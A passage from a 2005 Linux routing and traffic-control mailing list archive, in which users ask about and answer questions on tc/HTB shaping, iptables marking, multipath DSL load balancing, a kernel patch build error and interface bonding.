#Filters tc filter add dev eth0 protocol ip parent 1: prio 0 handle 2 fw classid 1:2 tc filter add dev eth0 protocol ip parent 1: prio 0 handle 3 fw classid 1:3 ... #iptables mangle rules iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.1 -j MARK --set-mark 2 iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.2 -j MARK --set-mark 2 ... #iptables allow forwarding on MAC address iptables -A FORWARD -o ppp0 -m mac --mac-source 00:0D:61:30:10:75 -j ACCEPT iptables -A FORWARD -o eth1 -m mac --mac-source 00:10:B5:01:AA:D0 -j ACCEPT ... Should note that the default policy of filter->forward is DROP. All other chains are defaulting on ACCEPT Now, no users can connect through the gateway. Our test traffic for the shapping works perfectly, but no internet traffic works. iptables -nvL output shows that the packets move through the forward chain in filter, but it doesn't reach the mangle table for marking the packets. It's as if the packets disappear... Anybody got some ideas? I still have to test the shaping using u32 matching, using iptables to do forwarding. Thanks in advance -- Kenneth Kalmer From andy.furniss@dsl.pipex.com Tue Feb 8 12:15:59 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 12:15:59 +0000 Subject: [LARTC] Shaping and forward In-Reply-To: References: Message-ID: <4208AD7F.5090605@dsl.pipex.com> Kenneth Kalmer wrote: > Lartc readers > > I have a peculiar problem with shaping and firewalling. > > My tc rules work great, below is a smaller version: > > #Root > tc qdisc del dev eth0 root > tc qdisc add dev eth0 root handle 1: htb default 100 > > #Root Class > tc class add dev eth0 parent 1: classid 1:1 htb rate 1024kbit quantum > 20000 burst 15k > > #Class for each user > tc class add dev eth0 parent 1:1 classid 1:2 htb rate 32kbit ceil > 128kbit prio 0 quantum 20000 burst 15k > tc class add dev eth0 parent 1:1 classid 1:3 htb rate 32kbit ceil > 128kbit prio 0 quantum 20000 burst 15k > ... 
> > # SFQ qdisc for each user class > tc qdisc add dev eth0 parent 1:2 handle 12: sfq perturb 10 > tc qdisc add dev eth0 parent 1:3 handle 13: sfq perturb 10 > ... > > #Filters > tc filter add dev eth0 protocol ip parent 1: prio 0 handle 2 fw classid 1:2 > tc filter add dev eth0 protocol ip parent 1: prio 0 handle 3 fw classid 1:3 > ... > > #iptables mangle rules > iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.1 -j MARK --set-mark 2 > iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.2 -j MARK --set-mark 2 You are shaping on eth0 but marking -o eth1 > ... > > #iptables allow forwarding on MAC address > iptables -A FORWARD -o ppp0 -m mac --mac-source 00:0D:61:30:10:75 -j ACCEPT > iptables -A FORWARD -o eth1 -m mac --mac-source 00:10:B5:01:AA:D0 -j ACCEPT > ... You need a rule to accept -i ppp0. Andy. > > Should note that the default policy of filter->forward is DROP. All > other chains are defaulting on ACCEPT > > Now, no users can connect through the gateway. Our test traffic for > the shapping works perfectly, but no internet traffic works. iptables > -nvL output shows that the packets move through the forward chain in > filter, but it doesn't reach the mangle table for marking the packets. > It's as if the packets disappear... > > Anybody got some ideas? I still have to test the shaping using u32 > matching, using iptables to do forwarding. 
> > Thanks in advance > From 64vn@cardvn.net Tue Feb 8 12:50:09 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Tue, 08 Feb 2005 19:50:09 +0700 Subject: [LARTC] Basic iproute configuration questions In-Reply-To: <42087DA5.7080105@llondel.org> References: <42087DA5.7080105@llondel.org> Message-ID: <4208B581.90909@cardvn.net> If nano-howto doesn't work, you should consult my different approach: http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking the tutorial comes with a completed daemon so you have a handy solution http://selab.edu.ms/twiki/bin/view/Networking/RoutesKeeperProject Mailing List Account wrote: > I've managed to get myself confused with what is probably quite simple > so if there's any definitive documentation then please give me > pointers. I've read and tried the nano.txt document, that's what I've > based my current setup on and it isn't working at the moment. > > I have two external links, a DSL link on eth1 and a cable link on > eth2. Both acquire their addresses via DHCP. The local network lives > on eth0 and has a static IP. The local network uses NAT to the outside > world. > > I need to be able to load balance between the two external links for > general outgoing traffic, force all outbound smtp traffic via eth1 and > be able to handle inbound traffic to various servers (IMAP, web, SMTP, > etc) on either link. My starting point is an old Pentium-2 box with > three network cards, running a fully-patched version of FC2 (kernel > 2.6.10-1.12_FC2). > > I had an old version that sort of worked on RH7.3 but it didn't do > load balancing (in those days the DSL link was an ISDN link so it > wasn't important) and handling inbound stuff was a crude hack[*] that > I'm sure isn't the best way to do things. > > So, what do I need to do? Am I missing a required kernel patch or > should the stock kernel be capable of what I want? Argh! 
> > Dave > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From 64vn@cardvn.net Tue Feb 8 12:55:51 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Tue, 08 Feb 2005 19:55:51 +0700 Subject: [LARTC] please guide me ...with regard to multipath dynamic routing in case of link failure In-Reply-To: <003201c50d24$5e650670$8d00150a@dreammac> References: <003201c50d24$5e650670$8d00150a@dreammac> Message-ID: <4208B6D7.1040503@cardvn.net> So you have to write a daemon to ping the remote gateway, and if ping fails, the daemon will remove that nexthop from the multipath route. The dead gateway detection patch can't help you in this case. That's why I created this project, download and run it, and everything solved, it's lack of documentation, so you're welcome to write it in the Wiki. http://selab.edu.ms/twiki/bin/view/Networking/RoutesKeeperProject Pankaj Agarwal wrote: > Hi, > > There's some very silly mistake i've done in my configuration. I did > by reading material on web. I'm enclosing my configuration script > below. The problem is its not routing the trafic from other interface > in case the first interface is down....which should be the wright > case. Kindly please guide me what i can do to make it > work..dynamically.. Also there is a very common situation which many > of you might have face...the interface which is gateway for my device > is my local router interface...and there's almost no chance of that's > being down ever...How can one configure ip route to consider the ISP > ends IP as the gateway when deciding on link status... 
> > Thanks, > > Pankaj Agarwal From lists@wildgooses.com Tue Feb 8 23:49:39 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Tue, 08 Feb 2005 23:49:39 +0000 Subject: [LARTC] TCP window based shaping Message-ID: <42095013.8030600@wildgooses.com> Does anyone have any pointers on how other people have implemented tcp window adjustment to do bandwidth shaping? Granted the basic idea is to set the window size to be RTT * bandwidth, but a quick squiz at google turns up mostly papers on how to implement this at the sender end with a view to some new magic TCP implementation. I'm really interested in notes on how to implement at the router side, perhaps with a view to writing a new QOS module. Biggest issue I can see right now is an architecture one, ie monitoring the incoming packet rate and then applying that to the outgoing ACK packets. Linux QOS separates the in and out traffic modules. Wondering how one best communicates this info... Thanks for any thoughts Ed W From david_list@boreham.org Tue Feb 8 23:57:28 2005 From: david_list@boreham.org (David Boreham) Date: Tue, 8 Feb 2005 15:57:28 -0800 Subject: [LARTC] TCP window based shaping References: <42095013.8030600@wildgooses.com> Message-ID: <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> > Does anyone have any pointers on how other people have implemented tcp > window adjustment to do bandwidth shaping? Hmm....I _heard_ that Packeteer had patents on this and so nobody else was attempting to do it. Possibly an incorrect rumor, but it made sense to me. 
From andy.furniss@dsl.pipex.com Wed Feb 9 01:59:47 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 09 Feb 2005 01:59:47 +0000 Subject: [LARTC] TCP window based shaping In-Reply-To: <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> References: <42095013.8030600@wildgooses.com> <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> Message-ID: <42096E93.3020906@dsl.pipex.com> David Boreham wrote: > >> Does anyone have any pointers on how other people have implemented tcp >> window adjustment to do bandwidth shaping? > > > Hmm....I _heard_ that Packeteer had patents on this and > so nobody else was attempting to do it. > > Possibly an incorrect rumor, but it made sense to me. They say on their site that their algorithm is patented which could be a pain if it's the obvious solution. The more I think about it (probably not enough yet), the more I think that just keeping state and depiggybacking acks could achieve much the same thing if your shaper is clever enough. The worst senario for me is bittorrent, and if I could depiggyback the acks I don't see that playing with window size on top of that would be any better than keeping state so that I had an idea of how much was unstoppably on the way. Closing the window down isn't going to stop what's allready left the sender and is sitting in a big modem buffer any quicker than me stopping sending acks. Just knowing how lagged out each connection is would be enough to allow me to change bandwidth more elegantly without too much buffer filling. Not with anything that exists in Linux now - but even just hacking HTB/HFSC so that a class could behave as full as soon as it sees traffic would be a start. I can allready sort of break slowstart by treating new connections harshly (short queue), though it would be nice in the case of bittorrent to be able to detect connections that go back into slowstart aswell - sfq sort of singles them out, but it's a bit late by the time it gets them. 
I guess there are other things you could do aswell like trying to account for different rtts with the intention of avoiding bursts. Andy. From iavramop@Princeton.EDU Wed Feb 9 07:27:55 2005 From: iavramop@Princeton.EDU (Ioannis C Avramopoulos (iavramop@Princeton.EDU)) Date: Wed, 09 Feb 2005 02:27:55 -0500 Subject: [LARTC] A question on the iproute default queues Message-ID: <3853fab2779e.4209752b@Princeton.EDU> Hi, when iproute is installed then the default queue that it is giving to an interface is pfifo_fast. I would like to ask whether it is possible to disable this feature and rather have the kernel give by default to an interface the queue that it would give if iproute hadn't been installed. I want to be able to customize the queue with tc only when it is necessary. Is this possible? Regards, Yannis From doc@lanaticasylum.de Wed Feb 9 07:56:39 2005 From: doc@lanaticasylum.de (Marcus Schmid) Date: Wed, 9 Feb 2005 08:56:39 +0100 (CET) Subject: [LARTC] Multihop route - TCP connection losses? Message-ID: Hi! In our students' hostel we have 6 DSL lines (dialups to different providers); we have set up a linux box (currently running 2.6.11-rc2-mm2, but the problem described hereafter also applies to previous 2.6-series kernels) with help from http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 Our Setup looks like this: 10.0.0.0/8 10.70.255.1 +----------+ +-----------+ | intranet |---| linux-box | +----------+ +-----------+ 10.254.0.1 | | | +-----------+ | | +-----| HW-router |---(DSL -> Provider) | | +-----------+ | | | +--------- (see above) [10.254.0.2] +------------- (see above) [10.254.0.3] (Above schematics drawn with only 3 instead of 6 DSL links) Our problem is as follows: it seems that when the route cache expires also existing TCP connections are rerouted, causing the connection to get lost. 
(Just a theory - I don't know how to check that) While that is fully comprehensible with UDP traffic, I thought I read somewhere that this shouldn't apply to TCP traffic (connections - once established - will always be routed through the initial hop). Does anyone know how to avoid this problem (which makes downloading big files a pain as some download-manager has to be used that supports appending/byte ranges)? Am I doing something wrong here, did I forget something? Our Setup is as simple as setting a multihop default route on the linux box like this: ip route add default proto static \ nexthop via 10.254.0.2 dev eth0 \ nexthop via 10.254.0.3 dev eth0 \ nexthop via 10.254.0.1 dev eth0 \ nexthop via 10.254.0.4 dev eth0 \ nexthop via 10.254.0.5 dev eth0 We don't do any NAT as this is done by the hardware DSL routers. Thank you for any help! Marcus ------------------------------------------------------------------------- The most difficult thing in the world is to know how to do a thing and to watch somebody else doing it wrong, without comment. From Robert Kurjata Wed Feb 9 08:18:35 2005 From: Robert Kurjata (Robert Kurjata) Date: Wed, 9 Feb 2005 09:18:35 +0100 Subject: [LARTC] Multihop route - TCP connection losses? In-Reply-To: References: Message-ID: <417042528.20050209091835@ire.pw.edu.pl> Hello Marcus, In your message dated 9 February 2005 (08:56:39) one can read: Many many years ago...... I faced the same problem :) The answer is in nano-howto. http://www.ssi.bg/~ja/ (look for nano-txt) and look at my WORKING example script placed there by Julian http://www.ssi.bg/~ja/tmp/mpath2.sh That script was originally used with success with 4 uplinks (shortened for simplicity). > Hi!
> In our students' hostel we have 6 DSL lines (dialups to different > providers); we have set up a linux box (currently running 2.6.11-rc2-mm2, > but the problem described hereafter also applies to previous 2.6-series > kernels) with help from > http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 > Our Setup looks like this: > 10.0.0.0/8 10.70.255.1 > +----------+ +-----------+ > | intranet |---| linux-box | > +----------+ +-----------+ 10.254.0.1 > | | | +-----------+ > | | +-----| HW-router |---(DSL -> Provider) > | | +-----------+ > | | > | +--------- (see above) [10.254.0.2] > +------------- (see above) [10.254.0.3] > (Above schematics drawn with only 3 instead of 6 DSL links) > Our problem is as follows: it seems that when the route cache expires also > existing TCP connections are rerouted, causing the connection to get lost. > (Just a theory - I don't know how to check that) > While that is fully comprehensible with UDP traffic, I thought I read > somewhere that this shouldn't apply to TCP traffic (connections - once > established - will always be routed through the initial hop). > Does anyone know how to avoid this problem (which makes downloading big > files a pain as some download-manager has to be used that supports > appending/byte ranges)? Am I doing something wrong here, did I forget > something? > Our Setup is as simple as setting a multihop default route on the linux > box like this: > ip route add default proto static \ > nexthop via 10.254.0.2 dev eth0 \ > nexthop via 10.254.0.3 dev eth0 \ > nexthop via 10.254.0.1 dev eth0 \ > nexthop via 10.254.0.4 dev eth0 \ > nexthop via 10.254.0.5 dev eth0 > We don't do any NAT as this is done by the hardware DSL routers. > Thank you for any help! > Marcus > ------------------------------------------------------------------------- > The most difficult thing in the world is to know how to do a thing and to > watch somebody else doing it wrong, without comment. 
> _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ -- Regards, Robert Kurjata From fun@dominic.idv.tw Wed Feb 9 10:13:34 2005 From: fun@dominic.idv.tw (fun) Date: Wed, 9 Feb 2005 18:13:34 +0800 Subject: [LARTC] problems with 2.4.28 + Julian's patch Message-ID: <20050209100705.M95153@kh.premtek.com.tw> I am using kernel 2.6.9 (gentoo,AMD64 version) + routes-2.6.9-11.diff If compile kernel with gcc 3.4.3, then the similar error comes out: ------------------ net/ipv4/fib_frontend.c: In function `fib_validate_source': include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available net/ipv4/fib_frontend.c:204: sorry, unimplemented: called from here include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available net/ipv4/fib_frontend.c:214: sorry, unimplemented: called from here make[2]: *** [net/ipv4/fib_frontend.o] Error 1 make[1]: *** [net/ipv4] Error 2 make: *** [net] Error 2 ------------------- Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks!
BR, Dominic Lu From ja@ssi.bg Wed Feb 9 10:39:22 2005 From: ja@ssi.bg (Julian Anastasov) Date: Wed, 9 Feb 2005 12:39:22 +0200 (EET) Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: <20050209100705.M95153@kh.premtek.com.tw> Message-ID: Hello, On Wed, 9 Feb 2005, fun wrote: > I am using kernel 2.6.9 (gentoo,AMD64 version) + routes-2.6.9-11.diff > If compile kernel with gcc 3.4.3, then the similar error comes out: > > ------------------ > net/ipv4/fib_frontend.c: In function `fib_validate_source': > include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not > available > net/ipv4/fib_frontend.c:204: sorry, unimplemented: called from here > include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not > available > net/ipv4/fib_frontend.c:214: sorry, unimplemented: called from here > make[2]: *** [net/ipv4/fib_frontend.o] Error 1 > make[1]: *** [net/ipv4] Error 2 > make: *** [net] Error 2 > ------------------- > > Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks! It should be fixed month ago but you need routes-2.6.10-12.diff. Another option is to remove the fib_result_table "__inline__" from include/net/ip_fib.h > BR, > Dominic Lu Regards -- Julian Anastasov From marcogh@linux.it Wed Feb 9 11:34:44 2005 From: marcogh@linux.it (marco ghidinelli) Date: Wed, 9 Feb 2005 12:34:44 +0100 Subject: [LARTC] TCP window based shaping In-Reply-To: <42095013.8030600@wildgooses.com> References: <42095013.8030600@wildgooses.com> Message-ID: <20050209113444.GA11322@circolab.net> On Tue, Feb 08, 2005 at 11:49:39PM +0000, Ed Wildgoose wrote: > Does anyone have any pointers on how other people have implemented tcp > window adjustment to do bandwidth shaping? 
> > Granted the basic idea is to set the window size to be RTT * bandwidth, > but a quick squiz at google turns up mostly papers on how to implement > this at the sender end with a view to some new magic TCP > implementation. I'm really interested in notes on how to implement at > the router side, perhaps with a view to writing a new QOS module. > > Biggest issue I can see right now is an architecture one, ie monitoring > the incoming packet rate and then applying that to the outgoing ACK > packets. instead of shaping the incoming traffic and estimate rate from the outgoing traffic, you can 'delay' the outgoing ACK, and estimate the rate from the raise of the sequence number. so you just shape on the outgoing queue, without take care of the incoming traffic. note that everything here is patented, so if you must have lawyers, if you want to develop.. :-/ http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2Fsearch-bool.html&r=0&f=S&l=50&TERM1=packeteer&FIELD1=&co1=AND&TERM2=&FIELD2=&d=ptxt -- BOFH excuse #33: pizeo-electric interference From fun@dominic.idv.tw Wed Feb 9 12:39:50 2005 From: fun@dominic.idv.tw (fun) Date: Wed, 9 Feb 2005 20:39:50 +0800 Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: References: <20050209100705.M95153@kh.premtek.com.tw> Message-ID: <20050209123701.M53981@dominic.idv.tw> Thanks Julian! The kernel build is OK after the fib_result_table "__inline__" is removed. BR, Dominic Lu > > Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks! > > It should be fixed month ago but you need routes-2.6.10-12.diff. 
> Another option is to remove the fib_result_table "__inline__" from > include/net/ip_fib.h > From carlos@www.senecacom.net Wed Feb 9 14:19:34 2005 From: carlos@www.senecacom.net (Carlos Alperin) Date: Wed, 9 Feb 2005 10:19:34 -0400 Subject: [LARTC] A newbie question Message-ID: <20050209141459.M33380@www.senecacom.net> This issue may sound trivial. I need to build a router to send Internet + VoIP traffic. The computers are on a different network than the phone gateway. The computers are going to be sent to a 3 Mbps connection using OSPF; in the meantime the phones are going to be sent to a T1 using OSPF too. The routing software is going to be Zebra. I need to switch the outgoing in case that the T1 or the 3 Mbps link goes down, and shape the traffic. The router is going to have 3 Ethernet ports plus the T1 card. Any suggestion? Carlos Alperin carlos@senecacom.net calperin@senecacom.net From Bernardo Silveira Wed Feb 9 16:41:12 2005 From: Bernardo Silveira (Bernardo Silveira) Date: Wed, 9 Feb 2005 14:41:12 -0200 Subject: [LARTC] Multiple gateways setup and timeout connections In-Reply-To: References: <28dab43f05020411011c0906c@mail.gmail.com> Message-ID: <28dab43f05020908413bc263d8@mail.gmail.com> On Mon, 7 Feb 2005 10:58:30 +0100, Uwe Kamper wrote: > > Hi, > > > > I've setup a gateway using multiple default gateways and netfilter > > MASQUERADE to load balance traffic between two DSL interfaces and one > > dedicated link, and when I try to download something big, or when I'm > > using MSN (both in clients under this gateway), sometimes, or most > > times, after a while the connection timeouts. The connection doesn't > > seem to change its gateway (verified using ip route list cache) > > Hello, > > did you apply the patch mentioned under section 4.2.2 of the LARTC.org- > HOWTO ( http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 or > http://www.ssi.bg/~ja/#routes ) to your Linux kernel sources?
> > > Uwe Kamper Yes, I've tested with and without them, in kernels 2.4.22 and 2.6.10. Bernardo Silveira Via IP Soluções para Internet Ltda From ro0ot@phreaker.net Wed Feb 9 18:20:56 2005 From: ro0ot@phreaker.net (ro0ot) Date: Thu, 10 Feb 2005 02:20:56 +0800 Subject: [LARTC] load balancing between two dsl links Message-ID: <420A5488.4000300@phreaker.net> Hi, I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) I would like to only allow ftp, pop3 and http via the DSL 1 and only smtp, ipsec and pptp via DSL 2. How can I do so? Can I use iproute to route these protocols? Below is my ip routing: - # DSL 1 ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 ip route add default via 2.2.2.209 table 1 # DSL 2 ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 ip route add default via 3.3.3.117 table 2 ip rule add from 2.2.2.208/30 lookup 1 ip rule add from 3.3.3.116/30 lookup 2 ip route add 3.3.3.116/30 dev eth2 table 1 ip route add 10.59.2.0/24 dev eth1 table 1 ip route add 127.0.0.0/8 dev lo table 1 ip route add 2.2.2.208/30 dev eth0 table 2 ip route add 10.59.2.0/24 dev eth1 table 2 ip route add 127.0.0.0/8 dev lo table 2 ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight 1 nexthop via 3.3.3.117 dev eth2 weight 1 Below is my iptables: - lanif="eth1" squid_box="10.59.2.3" lan_net="10.59.2.0/24" $ECHO 1 > /proc/sys/net/ipv4/ip_forward $IPTABLES -t nat -A PREROUTING -i $lanif -s !
$squid_box -p tcp --dport 80 -j DNAT --to $squid_box:3128 $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j SNAT --to $lan_ip $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p tcp --dport 3128 -j ACCEPT $IPTABLES -t nat -A POSTROUTING -j MASQUERADE Regards, ro0ot From Bernardo Silveira Wed Feb 9 18:36:48 2005 From: Bernardo Silveira (Bernardo Silveira) Date: Wed, 9 Feb 2005 16:36:48 -0200 Subject: [LARTC] load balancing between two dsl links In-Reply-To: <420A5488.4000300@phreaker.net> References: <420A5488.4000300@phreaker.net> Message-ID: <28dab43f050209103670b12985@mail.gmail.com> On Thu, 10 Feb 2005 02:20:56 +0800, ro0ot wrote: > Hi, > > I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps > uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) > > I would like to only allow ftp, pop3 and http via the DSL 1 and only > smtp, ipsec and pptp via DSL 2. > > How can I do so? Can I use iproute to route these protocols? > > Below is my ip routing: - > > # DSL 1 > ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 > ip route add default via 2.2.2.209 table 1 > > # DSL 2 > ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 > ip route add default via 3.3.3.117 table 2 > > ip rule add from 2.2.2.208/30 lookup 1 > ip rule add from 3.3.3.116/30 lookup 2 > > ip route add 3.3.3.116/30 dev eth2 table 1 > ip route add 10.59.2.0/24 dev eth1 table 1 > ip route add 127.0.0.0/8 dev lo table 1 > > ip route add 2.2.2.208/30 dev eth0 table 2 > ip route add 10.59.2.0/24 dev eth1 table 2 > ip route add 127.0.0.0/8 dev lo table 2 > > ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight > 1 nexthop via 3.3.3.117 dev eth2 weight 1 > > Below is my iptables: - > > lanif="eth1" > squid_box="10.59.2.3" > lan_net="10.59.2.0/24" > > $ECHO 1 > /proc/sys/net/ipv4/ip_forward > > $IPTABLES -t nat -A PREROUTING -i $lanif -s !
$squid_box -p tcp --dport > 80 -j DNAT --to $squid_box:3128 > $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j > SNAT --to $lan_ip > $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p > tcp --dport 3128 -j ACCEPT > > $IPTABLES -t nat -A POSTROUTING -j MASQUERADE > > Regards, > ro0ot Hi, You can use: ipchains -A INPUT -p tcp -s 0/0 --dport 21 -m 1 ipchains -A INPUT -p tcp -s 0/0 --dport 110 -m 1 and ip rule add fwmark 1 table 1 prio 15000 And the same for the other DSL. BTW, is the current configuration working ok now? What kernel are you using, which patches? Because I'm using a similar configuration and I'm having issues with some connections timing out. Regards, Bernardo Silveira Via IP Soluções para Internet From 64vn@cardvn.net Wed Feb 9 22:29:59 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Thu, 10 Feb 2005 05:29:59 +0700 Subject: [LARTC] Multiple gateways setup and timeout connections In-Reply-To: <28dab43f05020908413bc263d8@mail.gmail.com> References: <28dab43f05020411011c0906c@mail.gmail.com> <28dab43f05020908413bc263d8@mail.gmail.com> Message-ID: <420A8EE7.4010206@cardvn.net> You have to CONNMARK them so outgoing connections don't get re-routed each time the routing cache expires. I've written about preventing the expiring of connections in http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking Bernardo Silveira wrote: >Yes, >I've tested with and without them, in kernels 2.4.22 and 2.6.10.
> > From andy.furniss@dsl.pipex.com Wed Feb 9 22:38:20 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 09 Feb 2005 22:38:20 +0000 Subject: [LARTC] TCP window based shaping In-Reply-To: <20050209113444.GA11322@circolab.net> References: <42095013.8030600@wildgooses.com> <20050209113444.GA11322@circolab.net> Message-ID: <420A90DC.6080108@dsl.pipex.com> marco ghidinelli wrote: > On Tue, Feb 08, 2005 at 11:49:39PM +0000, Ed Wildgoose wrote: > >>Does anyone have any pointers on how other people have implemented tcp >>window adjustment to do bandwidth shaping? >> >>Granted the basic idea is to set the window size to be RTT * bandwidth, >>but a quick squiz at google turns up mostly papers on how to implement >>this at the sender end with a view to some new magic TCP >>implementation. I'm really interested in notes on how to implement at >>the router side, perhaps with a view to writing a new QOS module. >> >>Biggest issue I can see right now is an architecture one, ie monitoring >>the incoming packet rate and then applying that to the outgoing ACK >>packets. > > > instead of shaping the incoming traffic and estimate rate from the > outgoing traffic, you can 'delay' the outgoing ACK, and estimate the rate > from the raise of the sequence number. > > so you just shape on the outgoing queue, without take care of the > incoming traffic. > > note that everything here is patented, so if you must have lawyers, if > you want to develop.. > > :-/ > > http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2Fsearch-bool.html&r=0&f=S&l=50&TERM1=packeteer&FIELD1=&co1=AND&TERM2=&FIELD2=&d=ptxt > Ewwww thats not nice - not that I know what those would stop you being able to do. I presume they just apply in the USA and wouldn't be enforcable in Europe yet as software patents are not allowed (yet)? Andy. 
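The two ideas raised in this thread, sizing the advertised window as RTT * bandwidth and estimating a flow's rate from the rise of its ACK numbers, worked through as an added example (not code from any poster or from the Linux QoS code). The function names, the 1460-byte MSS and the ACK trace are constructed for illustration.

```python
"""Router-side window sizing and ACK-based rate estimate (added illustration)."""

SEQ_MOD = 1 << 32      # TCP sequence and ACK numbers are 32-bit and wrap
MAX_FIELD = 0xFFFF     # the window field in the TCP header is 16 bits


def window_for_rate(rate_bps, rtt_ms, mss=1460):
    """Window in bytes that holds one flow to rate_bps at the given RTT.

    window = RTT * bandwidth, rounded down to whole segments and never
    below one segment, because a smaller window would stall the flow.
    """
    if rate_bps <= 0 or rtt_ms <= 0:
        raise ValueError("rate and RTT must be positive")
    bdp_bytes = rate_bps * rtt_ms // 8000          # bits/s * ms -> bytes
    return max(1, bdp_bytes // mss) * mss


def window_field(window_bytes, wscale=0):
    """Value for the 16-bit header field of ACKs on this connection.

    wscale is the shift the receiver announced in its SYN (0 if window
    scaling was not negotiated). The field is kept at 1 or more so the
    rewrite never turns into a zero-window advertisement.
    """
    if not 0 <= wscale <= 14:
        raise ValueError("window scale shift cannot exceed 14")
    return min(max(1, window_bytes >> wscale), MAX_FIELD)


def advertised_bytes(field, wscale=0):
    """Window the sender actually honours for a given field and shift."""
    return field << wscale


def max_rate_bps(field, wscale, rtt_ms):
    """Ceiling on one flow's rate for an advertised window and RTT."""
    return advertised_bytes(field, wscale) * 8000 // rtt_ms


def ack_rate_bps(samples):
    """Estimate delivered bits/s from (time_s, ack_number) observations.

    Only forward progress past the highest ACK seen is counted, so
    duplicate and reordered ACKs add nothing and a 32-bit wrap is handled.
    """
    if len(samples) < 2:
        raise ValueError("need at least two samples")
    highest = samples[0][1]
    total = 0
    for _, ack in samples[1:]:
        delta = (ack - highest) % SEQ_MOD
        if 0 < delta < SEQ_MOD // 2:               # genuine forward progress
            total += delta
            highest = ack
    elapsed = samples[-1][0] - samples[0][0]
    if elapsed <= 0:
        raise ValueError("samples must span a positive interval")
    return total * 8 / elapsed


# Constructed trace: wraps past 2**32, then one reordered and one duplicate ACK.
TRACE = [
    (0.00, 4294960000),
    (0.50, 55204),       # wrapped, +62500 bytes
    (0.60, 50000),       # older ACK arriving late, ignored
    (0.75, 55204),       # duplicate ACK, ignored
    (1.00, 117704),      # +62500 bytes
]

if __name__ == "__main__":
    target = 1_000_000                             # 1 Mbit/s for this flow
    win = window_for_rate(target, rtt_ms=100)
    print("measured bits/s:", ack_rate_bps(TRACE))
    print("window bytes   :", win)
    print("field, shift 2 :", window_field(win, 2))
```

Without window scaling the field tops out at 65535 bytes, so at a 200 ms RTT a single flow cannot be granted more than about 2.6 Mbit/s however the target is set.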
From fdelawarde@wirelessmundi.com Thu Feb 10 02:10:24 2005 From: fdelawarde@wirelessmundi.com (Francois) Date: Thu, 10 Feb 2005 03:10:24 +0100 Subject: [LARTC] One "200Mbps" virtual link between 2 ethernet adaptators of 2 linux boxes. Message-ID: <20050210022030.D0D62408D@outpost.ds9a.nl> Hi, ------- ------- | B |eth0---------eth0| C | | |eth1---------eth1| | ------- ------- In an attempt to have the install setup to increase speed and/or reliability of a link between two linux machines (for example in case of a wireless connection), I read that there were more than one solution, for example the old eql driver, bonding driver and teql which all seem to be doing almost the same thing (round robin on packets), or multipath routing using "nexthop" (maybe??). I would like to know if someone had done some knowledge concerning same type of setup (no doubt, it's an advanced routing mailing-list) and could explain me how these solutions differ and which would could be the best? Also, I started testing a configuration in order to try the bonding driver. ------- | A | | | ------- ___|__ |switch| |______| ------- | | ------- | B |eth0--- ---eth0| C | | |eth1---------eth1| | ------- ------- Machine A: (192.168.1.10) PC used to configure B&C (the only one that has a screen) Machine B&C: Very simple bonding configuration: modprobe bonding mode=1 ip addr add dev bond0 192.168.1.1/24 brd + #for B and .2 for C ip link set bond0 up ip link set eth0 up ip link set eth1 up ifenslave bond0 eth0 eth1 The bad thing is: B pinging C has 50% packet lost which would mean assuming that the round robin of the module works that a route from one of the interfaces doesn't reach C (pinging from A to 192.168.1.1 gives also 50%). Anyone has an idea on this matter? Thank you very much! François.
